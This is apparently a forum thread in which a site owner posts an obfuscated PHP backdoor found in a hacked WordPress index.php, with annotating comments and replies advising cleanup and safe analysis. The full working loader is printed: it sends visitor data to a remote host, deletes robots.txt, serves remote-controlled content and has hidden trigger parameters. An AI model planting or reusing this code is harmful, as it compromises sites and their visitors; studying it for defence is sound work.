This code appeared at the top of index.php after the WordPress installation was compromised:
<?php
/*
 * NOTE(review): this is an injected WordPress backdoor / remote-content loader,
 * not site code. It is kept here byte-for-byte for analysis; the comments
 * decode what the visible statements do. Treat the host as compromised and
 * rebuild from a known-good source rather than editing this file in place.
 *
 * Obfuscation layers visible in this listing:
 *  - $O0_OO00__O is a 68-character alphabet built with urldecode(); every
 *    other $O..O variable assigned below is a PHP function name spelled out
 *    by indexing into it. Resolving the indices gives:
 *      $OO__O000_O = file_get_contents   $OO00_O__0O = http_build_query
 *      $O0_0OO_O0_ = base64_decode       $OO_0_OO00_ = gzuncompress
 *      $O___00O0OO = file_exists         $O00O_O_0O_ = curl_setopt
 *      $OO00___O0O = preg_split          $OO_0_O_00O = curl_close
 *      $O0_O_00_OO = str_split           $O_0O__OO00 = curl_init
 *      $O00O_0O_O_ = curl_exec           $O__0O0O_O0 = array_pop
 *      $O0O___0OO0 = var_dump            $O__O_O00O0 = is_array
 *      $O___0O0O0O = print_r             $O000_O_O_O = unlink
 *      $O0OO___O00 = strpos              $O00_OO_0O_ = count
 *      $O0O0_O_0_O = md5
 *  - ${"x47x4cx4fx42x41x4cx53"}[...] is $GLOBALS[...]: the paste appears to
 *    have stripped the backslashes of the \x escapes (\x47\x4c\x4f\x42\x41
 *    \x4c\x53 spells "GLOBALS"). The key is the hex-escaped name of one of
 *    the variables above, so e.g. $GLOBALS["O0O___0OO0"](...) is a var_dump()
 *    call. ${"x5fx53x45x52x56x45x52"} is $_SERVER, ${"x5fx47x45x54"} is $_GET.
 *  - $params['api'] is built by taking the odd-position characters of the
 *    long literal string and base64-decoding them; following that derivation
 *    it appears to be http://5103-ch4-v69.nicetryet.xyz (re-run the same two
 *    steps offline to confirm before blocking or hunting on it).
 *  - The paste also wrapped the code mid-token (end of the first two code
 *    lines, and the "x5f" / "x4fx30x5f" split near the end); rejoin those
 *    before feeding the listing to any tool.
 *
 * Behaviour, in execution order (see the per-function comments below):
 *  1. Collects host, request URI, referer, user agent, client IP, scheme and
 *     Accept-Language from $_SERVER.
 *  2. Request parameters that change its behaviour, useful as access-log
 *     search terms: "params" (print_r()s the collected data and exits, no
 *     authentication), "pwd163" + "sitemap" [+ "google_url"] (gated by an
 *     md5 check, then pings a Google sitemap URL), "st" (dumps that ping),
 *     "dump" (dumps the remote reply and exits).
 *  3. Deletes the site's robots.txt if present.
 *  4. POSTs the collected visitor data to $params['api'] with the site's
 *     hostname as the User-Agent, base64-decodes and inflates the reply with
 *     gzuncompress(), splits it on '|', sends every part but the last as an
 *     HTTP header and echoes the base64-decoded last part as the page body,
 *     then exits -- i.e. the remote server decides what each visitor sees
 *     (typical of cloaked SEO-spam injections).
 *     If the remote server is unreachable the decode chain appears to yield
 *     an empty body and the script still exits, so the site would render
 *     blank rather than falling through to WordPress -- an observable symptom.
 */
$O0_OO00__O=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OO__O000_O=$O0_OO00__O[42].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[31].$O0_OO00__O[10].$O0_OO00__O[65].$O0_OO00__O[31].$O0_OO00__O[13].$O0_OO00__O[10].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[31].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[40];$OO00_O__0O=$O0_OO00__O[45].$O0_OO00__O[13].$O0_OO00__O[13].$O0_OO00__O[44].$O0_OO00__O[10].$O0_OO00__O[3].$O0_OO00__O[60].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[34].$O0_OO00__O[10].$O0_OO00__O[43].$O0_OO00__O[60].$O0_OO00__O[31].$O0_OO00__O[53].$O0_OO00__O[55];$O0_0OO_O0_=$O0_OO00__O[3].$O0_OO00__O[21].$O0_OO00__O[40].$O0_OO00__O[31].$O0_OO00__O[62].$O0_OO00__O[58].$O0_OO00__O[10].$O0_OO00__O[34].$O0_OO00__O[31].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[34].$O0_OO00__O[31];$OO_0_OO00_=$O0_OO00__O[65].$O0_OO00__O[59].$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[46].$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[31].$O0_OO00__O[40].$O0_OO00__O[40];$O___00O0OO=$O0_OO00__O[42].$O0_OO00__O[63].$O0_OO00__O[39].$O0_OO00__O[31].$O0_OO00__O[10].$O0_OO00__O[31].$O0_OO00__O[15].$O0_OO00__O[63].$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[40];$O00O_O_0O_=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[31].$O0_OO00__O[13].$O0_OO00__O[0].$O0_OO00__O[44].$O0_OO00__O[13];$OO00___O0O=$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[31].$O0_OO00__O[65].$O0_OO00__O[10].$O0_OO00__O[40].$O0_OO00__O[44].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[13];$OO_0_O_00O=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[56].$O0_OO00__O[39].$O0_OO00__O[0].$O0_OO00__O[40].$O0_OO00__O[31];$O0_O_00_OO=$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[53].$O0_OO00__O[10].$O
0_OO00__O[40].$O0_OO00__O[44].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[13];$O_0O__OO00=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[63].$O0_OO00__O[13];$O00O_0O_O_=$O0_OO00__O[56].$O0_OO00__O[60].$O0_OO00__O[53].$O0_OO00__O[39].$O0_OO00__O[10].$O0_OO00__O[31].$O0_OO00__O[15].$O0_OO00__O[31].$O0_OO00__O[56];$O__0O0O_O0=$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[53].$O0_OO00__O[21].$O0_OO00__O[55].$O0_OO00__O[10].$O0_OO00__O[44].$O0_OO00__O[0].$O0_OO00__O[44];$O0O___0OO0=$O0_OO00__O[50].$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[10].$O0_OO00__O[34].$O0_OO00__O[60].$O0_OO00__O[46].$O0_OO00__O[44];$O__O_O00O0=$O0_OO00__O[63].$O0_OO00__O[40].$O0_OO00__O[10].$O0_OO00__O[21].$O0_OO00__O[53].$O0_OO00__O[53].$O0_OO00__O[21].$O0_OO00__O[55];$O___0O0O0O=$O0_OO00__O[44].$O0_OO00__O[53].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[13].$O0_OO00__O[10].$O0_OO00__O[53];$O000_O_O_O=$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[39].$O0_OO00__O[63].$O0_OO00__O[5].$O0_OO00__O[25];$O0OO___O00=$O0_OO00__O[40].$O0_OO00__O[13].$O0_OO00__O[53].$O0_OO00__O[44].$O0_OO00__O[0].$O0_OO00__O[40];$O00_OO_0O_=$O0_OO00__O[56].$O0_OO00__O[0].$O0_OO00__O[60].$O0_OO00__O[5].$O0_OO00__O[13];$O0O0_O_0_O=$O0_OO00__O[46].$O0_OO00__O[34].$O0_OO00__O[9];
/* Sitemap-ping helper ($googleUrl, $sitemap, $params): formats
   "https://<googleUrl>/ping?sitemap=<protocol><host>/<sitemap>", fetches it with the
   fetch helper below, and exits with "success" if the reply contains "google"; otherwise
   it retries over plain http and exits with "success" or "failed". With the "st" request
   parameter set it var_dump()s the URL and the reply instead. Purpose: get attacker-supplied
   sitemap URLs submitted for indexing. */
function 
O00O___O0O($googleUrl,$O_O_0_O0O0,$params){$O_O0_00OO_='https://%s/ping?sitemap=%s%s/%s';$O_0OO00_O_=sprintf($O_O0_00OO_,$googleUrl,$params['protocol'],$params['server_domain'],$O_O_0_O0O0);$O00_O0OO__=OO__000OO_($O_0OO00_O_);if(isset($_REQUEST['st'])){${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($O_0OO00_O_);${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($O00_O0OO__);die();}$OO__00OO_0='google';$O0_0O_O_O0='success';$O_O_OO00_0='failed';if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx4fx5fx5fx5fx4fx30x30"]($O00_O0OO__,$OO__00OO_0)!=false){die($O0_0O_O_O0);}else{$O_O0_00OO_='http://%s/ping?sitemap=%s%s/%s';$O_0OO00_O_=sprintf($O_O0_00OO_,$googleUrl,$params['protocol'],$params['server_domain'],$O_O_0_O0O0);$O00_O0OO__=OO__000OO_($O_0OO00_O_);if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx4fx5fx5fx5fx4fx30x30"]($O00_O0OO__,$OO__00OO_0)!=false){die($O0_0O_O_O0);}die($O_O_OO00_0);}}
/* HTTP fetch helper ($url, $postData = '', $userAgent = ''): with no POST data it first tries
   @file_get_contents($url) and returns that when it is truthy; otherwise it uses curl with
   CURLOPT_RETURNTRANSFER, a 20-second timeout, CURLOPT_FRESH_CONNECT and the given User-Agent,
   POSTing http_build_query($postData) when $postData is an array (a non-array, non-empty
   $postData sets CURLOPT_POST without a body). Warnings are suppressed, so failures surface
   only as false/empty return values. */
function OO__000OO_($url,$O0OO_00_O_='',$O00O_0_O_O=''){if($O0OO_00_O_==''){$OO_0_OO0_0=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx5fx4fx30x30x30x5fx4f"]($url);if($OO_0_OO0_0){return 
$OO_0_OO0_0;}}$OO0_OO_00_=${"x47x4cx4fx42x41x4cx53"}["x4fx5fx30x4fx5fx5fx4fx4fx30x30"]();${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_URL,$url);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_USERAGENT,$O00O_0_O_O);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_RETURNTRANSFER,1);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_TIMEOUT,20);${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_FRESH_CONNECT,TRUE);if($O0OO_00_O_!=''){${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_POST,1);if(${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx4fx5fx4fx30x30x4fx30"]($O0OO_00_O_)){${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx4fx5fx30x4fx5f"]($OO0_OO_00_,CURLOPT_POSTFIELDS,${"x47x4cx4fx42x41x4cx53"}["x4fx4fx30x30x5fx4fx5fx5fx30x4f"]($O0OO_00_O_));}}$OO_0_OO0_0=${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x4fx5fx30x4fx5fx4fx5f"]($OO0_OO_00_);${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx30x5fx4fx5fx30x30x4f"]($OO0_OO_00_);return $OO_0_OO0_0;}
/* Deletes robots.txt from the current working directory if it exists (warnings suppressed),
   presumably so crawlers are not kept away from the injected content -- TODO confirm intent. */
function OO_00__O0O(){if(${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx5fx30x30x4fx30x4fx4f"]('robots.txt')){@${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x30x5fx4fx5fx4fx5fx4f"]('robots.txt');}}
/* Main flow: decode the remote URL (odd-position characters of the literal, then base64),
   gather $_SERVER data into $params, handle the "params" / "pwd163" / "dump" request triggers
   listed in the header comment, delete robots.txt, then fetch and render whatever the remote
   server returns. Note the client IP is taken from HTTP_X_FORWARDED_FOR whenever HTTP_VIA is
   present, i.e. from client-controlled headers. */
$O_O0O_0_O0="jaAHqRd0vcxDaoKvVLTzXUIxEMtDwMxtLYT2Pgh0cLbXfYs2vODSC5PuVaXWgNDlDdwHrJS5gZOXaQguzevHyli6";$O_00_0_OOO=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx4fx5fx30x30x5fx4fx4f"]($O_O0O_0_O0);$O0O0O_O__0='';for ($OO_0O_O_00=0;$OO_0O_O_00<${"x47x4cx4fx42x41x4cx53"}["x4fx30x30x5fx4fx4fx5fx30x4fx5f"]($O_00_0_OOO);$OO_0O_O_00++){if($OO_0O_O_00%2!=0){$O0O0O_O__0.=$O_00_0_OOO[$OO_0O_O_00];}}$params['default_params']=$O_O0O_0_O0;$params['api']=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($O0O0O_O__0);$params['server_domain'] 
=isset(${"x5fx53x45x52x56x45x52"}['HTTP_HOST'])?${"x5fx53x45x52x56x45x52"}['HTTP_HOST']:${"x5fx53x45x52x56x45x52"}['SERVER_NAME'];$params['request_url']=${"x5fx53x45x52x56x45x52"}['REQUEST_URI'];$params['referer']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_REFERER'])?${"x5fx53x45x52x56x45x52"}['HTTP_REFERER']:'';$params['user_agent']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_USER_AGENT'])?${"x5fx53x45x52x56x45x52"}['HTTP_USER_AGENT']:'';$params['ip']=isset(${"x5fx53x45x52x56x45x52"}["HTTP_VIA"])?${"x5fx53x45x52x56x45x52"}["HTTP_X_FORWARDED_FOR"]:${"x5fx53x45x52x56x45x52"}["REMOTE_ADDR"];$params['protocol']=isset(${"x5fx53x45x52x56x45x52"}['HTTPS'])?'https://':'http://';$params['language']=isset(${"x5fx53x45x52x56x45x52"}['HTTP_ACCEPT_LANGUAGE'])?${"x5fx53x45x52x56x45x52"}['HTTP_ACCEPT_LANGUAGE']:'';if(isset($_REQUEST['params'])) {${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx5fx30x4fx30x4fx30x4f"]($params);die();}if(isset($_REQUEST['pwd163'])){if(${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx30x5fx4fx5fx30x5fx4f"]($_REQUEST['pwd163']."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"x5fx47x45x54"}['sitemap'])){$O_O_0_O0O0=${"x5fx47x45x54"}['sitemap'];$O0_0O_0_OO='www.google.com';if(isset(${"x5fx47x45x54"}['google_url'])){$O0_0O_0_OO=${"x5fx47x45x54"}['google_url'];}O00O___O0O($O0_0O_0_OO,$O_O_0_O0O0,$params);}}}OO_00__O0O();$O_O_00_OO0=array('domain'=>$params['server_domain'],'request_url'=>$params['request_url'],'ip'=>$params['ip'],'agent'=>$params['user_agent'],'referer'=>$params['referer'],'protocol'=>$params['protocol'],'language'=>$params['language']);$OOO00__0_O=OO__000OO_($params['api'],$O_O_00_OO0,$params['server_domain']);if(isset($_REQUEST['dump'])){${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($OOO00__0_O);$OOO00__0_O=OO__000OO_("http://google.co.jp");${"x47x4cx4fx42x41x4cx53"}["x4fx30x4fx5fx5fx5fx30x4fx4fx30"]($OOO00__0_O);die();}$OOO00__0_O=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx5fx30x5fx4fx4fx30x30x5f"](${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5f
x4fx30x5f"]($OOO00__0_O));$OO000___OO=@${"x47x4cx4fx42x41x4cx53"}["x4fx4fx30x30x5fx5fx5fx4fx30x4f"]("/\|/si",$OOO00__0_O,-1,PREG_SPLIT_NO_EMPTY);if($OO000___OO!==false){$O0OO_00_O_=${"x47x4cx4fx42x41x4cx53"}["x4fx5fx5fx30x4fx30x4fx5fx4fx30"]($OO000___OO);$O0OO_00_O_=${"x47x4cx4fx42x41x4cx53"}["x4fx30x5fx30x4fx4fx5fx4fx30x5f"]($O0OO_00_O_);foreach($OO000___OO as $header){@header($header);}echo $O0OO_00_O_;die();} ?>
Does anyone have an idea what it does? Thanks in advance.
I tried to understand it, but my PHP is a little rusty.
The code you posted is malicious and has likely been injected into your website. Follow these steps:
Prevent future breaches by investigating how the attacker got in and keeping your security measures up to date.
You’ve been pwned.
To reverse-engineer this obfuscated code efficiently, you need an IDE (integrated development environment) set up to debug PHP. If I were to do this reverse-engineering, I would use PhpStorm with Xdebug; I already have that setup ready to go. You could also use VS Code with Xdebug.
Then you can open up this code in the IDE and format it so you can see where the php statements begin and end.
Next you can refactor the code to rename the obfuscated variables (for example `$O0_OO00__O`) to something easier to read. Then you can step through the code line by line and try to figure out what it does.
Considering this is malware, it’s probably best to analyze it on a virtual machine you can destroy when you’re done.
For what it’s worth, there are many better ways to build your php expertise than messing around with this sort of garbage.